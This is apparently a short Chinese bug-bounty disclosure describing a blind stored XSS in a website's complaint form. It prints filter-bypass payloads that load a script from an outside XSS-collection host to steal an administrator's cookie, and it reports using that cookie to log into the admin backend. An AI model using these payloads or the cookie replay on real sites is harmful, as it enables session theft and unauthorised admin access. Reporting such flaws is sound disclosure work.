好久没有玩XSS了，看派代的管理员在漏洞回复中说有不少小伙伴在扫描他们网站（感觉这就不好了吧，大家可以收到测试嘛，不要把人家服务器扫坏了），看了派代很受欢迎，就手工检测了下。
发现派代网好像对XSS做了过滤，但是过滤不严，可被绕过，导致成功跨进后台！！！

在投诉处，起初是直接写入傻瓜试的盲打xss code：

"><script src=http://www.xss.com/x.js></script>

但是过了一天，没反应，于是又随手试了一下：

"><img src=x onerror="var s=createElement('s

cript');document.body.appendChild(s);s.src='http://www.xss.com/x.js';">

很快就收到邮件了，打开xss平台看到了cookie啊，激动.

那收到的cookie登录一下看看：

 



哈哈，果然是后台啊，后台的内容丰富的很嘛，看样子。

不过没敢动，这后台很复杂，怕出问题。谢谢！
漏洞证明：
就详细说明
修复方案：
过滤XSS，就要过滤的相对完全点嘛